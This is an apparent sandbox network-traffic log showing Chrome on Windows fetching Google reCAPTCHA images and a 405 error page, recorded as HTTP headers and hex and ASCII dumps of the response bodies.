                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC1286INData Raw: 2d 63 34 4f 58 6e 44 44 77 31 32 6c 68 73 73 4e 49 37 69 77 66 30 61 41 66 70 36 79 31 57 5a 54 55 5a 4d 4d 5a 62 45 58 42 73 38 31 32 5f 63 2d 37 71 4f 68 37 76 71 4f 4a 6f 4e 58 46 64 45 67 36 79 73 65 4b 46 58 61 36 6d 43 61 62 43 57 33 38 77 74 67 75 57 31 77 30 5f 4a 62 79 58 4d 63 52 70 44 7a 76 66 69 2d 33 37 6b 44 43 46 76 62 54 78 58 43 73 46 59 59 33 74 77 71 76 42 5a 64 48 41 6f 44 75 48 36 68 4a 42 44 46 69 73 51 35 49 58 6f 7a 70 5a 76 33 46 53 7a 54 4d 43 4a 79 42 75 41 52 56 7a 55 65 35 63 35 71 4e 59 61 33 70 63 4e 45 75 36 35 76 5f 54 31 39 43 5f 6f 36 36 68 7a 4e 5f 4b 52 47 6b 6e 6e 65 6a 4a 4c 52 42 31 5f 7a 32 42 52 76 73 69 6e 34 6a 73 55 64 6b 77 4e 62 69 75 5a 34 33 38 45 6f 76 36 43 2d 5f 33 38 6f 50 67 6a 71 39 7a 49 47 57 77 6a
                                                                                                                                                                                                                                                                  Data Ascii: -c4OXnDDw12lhssNI7iwf0aAfp6y1WZTUZMMZbEXBs812_c-7qOh7vqOJoNXFdEg6yseKFXa6mCabCW38wtguW1w0_JbyXMcRpDzvfi-37kDCFvbTxXCsFYY3twqvBZdHAoDuH6hJBDFisQ5IXozpZv3FSzTMCJyBuARVzUe5c5qNYa3pcNEu65v_T19C_o66hzN_KRGknnejJLRB1_z2BRvsin4jsUdkwNbiuZ438Eov6C-_38oPgjq9zIGWwj
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  85192.168.2.1649816142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA6aKgKXaVx0pzUyPhNpP81tC9vowwRIv_H5QEpw_3-VVjJAix-NPyxXGouAtmE_vTn4S_euGzGphYBBQHDxbQPANlvJA0FKUilBpXe45XLcNk7ElD-2BBdElX3zgpt8KT_nXNv4Nq9utVoF4ywsZvwR_z0gphSUFaSuQjnZENd_jRXJR1Pm2UFXwUh2k-4aITHgyHKtpHhb4bD9uwlpYOW4FhCp_w&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e2eca1451c1cfc28 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:42 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:42 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC697INData Raw: 31 37 30 35 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 1705JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1378INData Raw: 51 bc 8f 68 f1 8d a0 ed 57 04 04 e9 80 33 db 8f c5 bd aa 8c ba 45 b5 bd d9 8d 6c c8 85 54 86 95 54 36 4e 47 0b c7 4c 9c 67 1d f8 ac 96 22 69 59 3b 74 d8 97 46 29 f3 3d d7 9f 63 e8 1d 56 c1 35 69 6e f5 21 a5 99 ed 66 7f 36 39 a0 b9 c2 f2 71 92 a5 48 cf 4f ba 40 e3 a7 71 49 ad 2e 2c 84 70 ae ab a9 41 6a ce a1 63 b8 81 9a 35 c7 b0 2c 1b 1c f0 47 5e a3 9a f0 a8 73 6a ab 71 a7 5e 6a 16 a4 39 2c f1 96 57 e3 1f 2a 85 fb a4 81 d0 8c 56 dd 9f 8b bc 61 a7 9d d1 78 a2 f2 78 b7 31 11 ce 56 4d c3 a9 e1 fd 4f 5f a7 a5 6f 1c 74 a2 ac d7 cb fe 1d 31 2c 22 6d b4 9a fe b6 d3 fa f2 3d 6e 5b 68 ee 5b 6e 74 cb 88 5d f3 bd 71 0c a7 77 04 80 bb 70 0f 04 65 7f 3a 82 6b 48 da ca de ee f1 27 5c c9 32 ce b0 e2 65 56 12 6d c6 e2 41 c6 01 39 c7 3c f1 cd 70 d6 7f 12 fc 41 1a ba df e8
                                                                                                                                                                                                                                                                  Data Ascii: QhW3ElTT6NGLg"iY;tF)=cV5in!f69qHO@qI.,pAjc5,G^sjq^j9,W*Vaxx1VMO_ot1,"m=n[h[nt]qwpe:kH'\2eVmA9<pA
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1378INData Raw: 44 e5 1b 7f 5f d6 df 23 ae d0 f5 bf 09 6a 09 15 bd bf 88 74 f9 27 85 57 fd 68 36 73 10 64 2c 14 76 20 06 c6 00 18 e9 e9 57 f5 39 64 d3 f4 f9 a5 96 d8 c3 12 2b 4d 07 da 21 07 72 67 24 92 a4 0c 11 81 b8 fb 64 f7 1e 59 75 a3 c6 c9 e6 86 62 15 3e ec eb 96 20 60 0e 9d fd f9 e7 14 fb 28 b5 dd 19 d4 e9 57 d7 b6 d1 9d df 25 b4 c7 ca 6d c4 90 a5 49 c0 1d f1 8c e7 e9 5d 14 f1 72 82 b4 97 7f 91 94 f0 70 6d c9 ec 7a a3 2c 50 1d b6 d2 af 92 dc a6 02 be 47 41 c8 e9 d3 a5 15 c3 c7 e3 9d 6d a2 43 2d 97 87 6f 1f 6f 32 dd d9 22 3f d3 05 97 8f 4c 0c 51 5d 4b 33 76 f8 1f de bf f9 11 2c b1 4f de 74 bf 04 79 2c 09 e4 47 2b c2 ca cb 1a 9f 2a 42 00 5c 91 9d c0 1e 9d 47 5e 06 38 e4 8a f6 ff 00 85 b6 c9 65 63 14 67 64 12 4a 88 ee 58 17 fb f8 52 4e 00 00 01 81 ea 70 7d ab cb 74 3d
                                                                                                                                                                                                                                                                  Data Ascii: D_#jt'Wh6sd,v W9d+M!rg$dYub> `(W%mI]rpmz,PGAmC-oo2"?LQ]K3v,Oty,G+*B\G^8ecgdJXRNp}t=
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1378INData Raw: 0f eb fa f5 17 b3 a7 4a 77 96 bf d7 43 bf f1 af c4 bf 0f 78 6a 49 ac f4 78 17 50 d4 f0 04 93 f9 be 68 18 20 15 2c 49 66 20 81 c0 fa 71 9c d7 85 f8 a3 57 d5 75 7b a9 ae 75 69 e6 be 9f 76 e4 dc 73 1a 07 fe e0 27 1d 00 ce 38 ed c6 05 64 b9 da 58 79 b9 1e 52 92 a7 e4 1f 30 5c 81 82 31 f7 40 c6 4e 70 05 49 31 96 66 71 21 46 37 0e 0e e2 77 04 57 39 24 1e c3 38 eb e9 de b5 54 d5 29 fb bf d7 ea 61 39 c9 bf 22 18 97 ca b9 74 8c b4 11 49 95 2c a8 4e 0e 38 c1 3d 89 00 fe 5d 73 9a 6a bf 99 fe aa 48 5a 2c 95 0a c4 e7 6f 04 60 9e a3 27 f3 f5 a9 54 5d 0b 81 b9 be 75 94 00 16 42 5b 07 8c 9c 76 3f 7b 8f 7a b9 a6 e9 d3 ea 5a 84 56 5a 55 ac b7 17 65 ca 98 a0 8c 16 62 a4 83 c2 8c 1f bd d7 d0 63 8a 53 57 bb 5f d7 98 6a dd 92 b9 42 38 e5 ba b8 11 a3 92 c7 95 d8 33 f2 75 ea 78
                                                                                                                                                                                                                                                                  Data Ascii: JwCxjIxPh ,If qWu{uivs'8dXyR0\1@NpI1fq!F7wW9$8T)a9"tI,N8=]sjHZ,o`'T]uB[v?{zZVZUebcSW_jB83ux
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1070INData Raw: 4e ca 18 e7 3c 57 ce 46 e2 ea 76 db 1f 99 26 cf 9f 72 fc cd d8 9c f0 0f 27 b7 b0 af ab bc 43 e1 0d 1f 57 f0 bd c5 c5 ac cf 75 0c c8 5a 5d ae 2e a7 04 a2 e1 83 e7 2a 72 a3 81 eb 8f 5a e7 fc 2f e0 9d 3b 40 d1 e1 b8 b3 6b 83 1c 92 be f3 3c 43 f7 6d 18 c1 60 ce bc 63 a6 7b 7e 35 ca a7 3c 3c 5d 97 33 6b fa d4 2a d5 75 92 6d 5a dd 6e 7c e5 65 67 a9 b4 c2 28 ad 6e da 57 01 81 58 8b 6f c0 c1 6c 60 92 07 1d 0e 39 38 cd 76 de 1e f0 0e bb 7f aa 7d 8f ec cd a6 db e4 49 25 cd d4 82 24 c1 e8 71 d5 ba 8f 97 df b7 35 ec 37 68 92 59 ef 94 4e 52 50 63 59 76 67 ce 70 39 1c 70 07 20 f3 c1 cf 39 15 59 62 2d 33 46 23 8f ca 0a 08 28 e7 0c 7b 7d e3 8e 70 71 c7 ae 0d 64 f3 6a 97 5e ed bf ae e7 33 b4 5f be af e5 fd 58 e9 7c 1b e0 9d 1b c1 d1 23 d8 88 ee 6e b6 94 96 f0 29 2e eb b4
                                                                                                                                                                                                                                                                  Data Ascii: N<WFv&r'CWuZ].*rZ/;@k<Cm`c{~5<<]3k*umZn|eg(nWXol`98v}I%$q57hYNRPcYvgp9p 9Yb-3F#({}pqdj^3_X|#n).
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  86192.168.2.1649815142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:42 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  87192.168.2.1649817142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA6aKgKXaVx0pzUyPhNpP81tC9vowwRIv_H5QEpw_3-VVjJAix-NPyxXGouAtmE_vTn4S_euGzGphYBBQHDxbQPANlvJA0FKUilBpXe45XLcNk7ElD-2BBdElX3zgpt8KT_nXNv4Nq9utVoF4ywsZvwR_z0gphSUFaSuQjnZENd_jRXJR1Pm2UFXwUh2k-4aITHgyHKtpHhb4bD9uwlpYOW4FhCp_w&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e2eca1451c1cfc28 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:43 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:43 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC697INData Raw: 31 37 30 35 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 1705JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC1378INData Raw: 51 bc 8f 68 f1 8d a0 ed 57 04 04 e9 80 33 db 8f c5 bd aa 8c ba 45 b5 bd d9 8d 6c c8 85 54 86 95 54 36 4e 47 0b c7 4c 9c 67 1d f8 ac 96 22 69 59 3b 74 d8 97 46 29 f3 3d d7 9f 63 e8 1d 56 c1 35 69 6e f5 21 a5 99 ed 66 7f 36 39 a0 b9 c2 f2 71 92 a5 48 cf 4f ba 40 e3 a7 71 49 ad 2e 2c 84 70 ae ab a9 41 6a ce a1 63 b8 81 9a 35 c7 b0 2c 1b 1c f0 47 5e a3 9a f0 a8 73 6a ab 71 a7 5e 6a 16 a4 39 2c f1 96 57 e3 1f 2a 85 fb a4 81 d0 8c 56 dd 9f 8b bc 61 a7 9d d1 78 a2 f2 78 b7 31 11 ce 56 4d c3 a9 e1 fd 4f 5f a7 a5 6f 1c 74 a2 ac d7 cb fe 1d 31 2c 22 6d b4 9a fe b6 d3 fa f2 3d 6e 5b 68 ee 5b 6e 74 cb 88 5d f3 bd 71 0c a7 77 04 80 bb 70 0f 04 65 7f 3a 82 6b 48 da ca de ee f1 27 5c c9 32 ce b0 e2 65 56 12 6d c6 e2 41 c6 01 39 c7 3c f1 cd 70 d6 7f 12 fc 41 1a ba df e8
                                                                                                                                                                                                                                                                  Data Ascii: QhW3ElTT6NGLg"iY;tF)=cV5in!f69qHO@qI.,pAjc5,G^sjq^j9,W*Vaxx1VMO_ot1,"m=n[h[nt]qwpe:kH'\2eVmA9<pA
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC1378INData Raw: 44 e5 1b 7f 5f d6 df 23 ae d0 f5 bf 09 6a 09 15 bd bf 88 74 f9 27 85 57 fd 68 36 73 10 64 2c 14 76 20 06 c6 00 18 e9 e9 57 f5 39 64 d3 f4 f9 a5 96 d8 c3 12 2b 4d 07 da 21 07 72 67 24 92 a4 0c 11 81 b8 fb 64 f7 1e 59 75 a3 c6 c9 e6 86 62 15 3e ec eb 96 20 60 0e 9d fd f9 e7 14 fb 28 b5 dd 19 d4 e9 57 d7 b6 d1 9d df 25 b4 c7 ca 6d c4 90 a5 49 c0 1d f1 8c e7 e9 5d 14 f1 72 82 b4 97 7f 91 94 f0 70 6d c9 ec 7a a3 2c 50 1d b6 d2 af 92 dc a6 02 be 47 41 c8 e9 d3 a5 15 c3 c7 e3 9d 6d a2 43 2d 97 87 6f 1f 6f 32 dd d9 22 3f d3 05 97 8f 4c 0c 51 5d 4b 33 76 f8 1f de bf f9 11 2c b1 4f de 74 bf 04 79 2c 09 e4 47 2b c2 ca cb 1a 9f 2a 42 00 5c 91 9d c0 1e 9d 47 5e 06 38 e4 8a f6 ff 00 85 b6 c9 65 63 14 67 64 12 4a 88 ee 58 17 fb f8 52 4e 00 00 01 81 ea 70 7d ab cb 74 3d
                                                                                                                                                                                                                                                                  Data Ascii: D_#jt'Wh6sd,v W9d+M!rg$dYub> `(W%mI]rpmz,PGAmC-oo2"?LQ]K3v,Oty,G+*B\G^8ecgdJXRNp}t=
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC1378INData Raw: 0f eb fa f5 17 b3 a7 4a 77 96 bf d7 43 bf f1 af c4 bf 0f 78 6a 49 ac f4 78 17 50 d4 f0 04 93 f9 be 68 18 20 15 2c 49 66 20 81 c0 fa 71 9c d7 85 f8 a3 57 d5 75 7b a9 ae 75 69 e6 be 9f 76 e4 dc 73 1a 07 fe e0 27 1d 00 ce 38 ed c6 05 64 b9 da 58 79 b9 1e 52 92 a7 e4 1f 30 5c 81 82 31 f7 40 c6 4e 70 05 49 31 96 66 71 21 46 37 0e 0e e2 77 04 57 39 24 1e c3 38 eb e9 de b5 54 d5 29 fb bf d7 ea 61 39 c9 bf 22 18 97 ca b9 74 8c b4 11 49 95 2c a8 4e 0e 38 c1 3d 89 00 fe 5d 73 9a 6a bf 99 fe aa 48 5a 2c 95 0a c4 e7 6f 04 60 9e a3 27 f3 f5 a9 54 5d 0b 81 b9 be 75 94 00 16 42 5b 07 8c 9c 76 3f 7b 8f 7a b9 a6 e9 d3 ea 5a 84 56 5a 55 ac b7 17 65 ca 98 a0 8c 16 62 a4 83 c2 8c 1f bd d7 d0 63 8a 53 57 bb 5f d7 98 6a dd 92 b9 42 38 e5 ba b8 11 a3 92 c7 95 d8 33 f2 75 ea 78
                                                                                                                                                                                                                                                                  Data Ascii: JwCxjIxPh ,If qWu{uivs'8dXyR0\1@NpI1fq!F7wW9$8T)a9"tI,N8=]sjHZ,o`'T]uB[v?{zZVZUebcSW_jB83ux
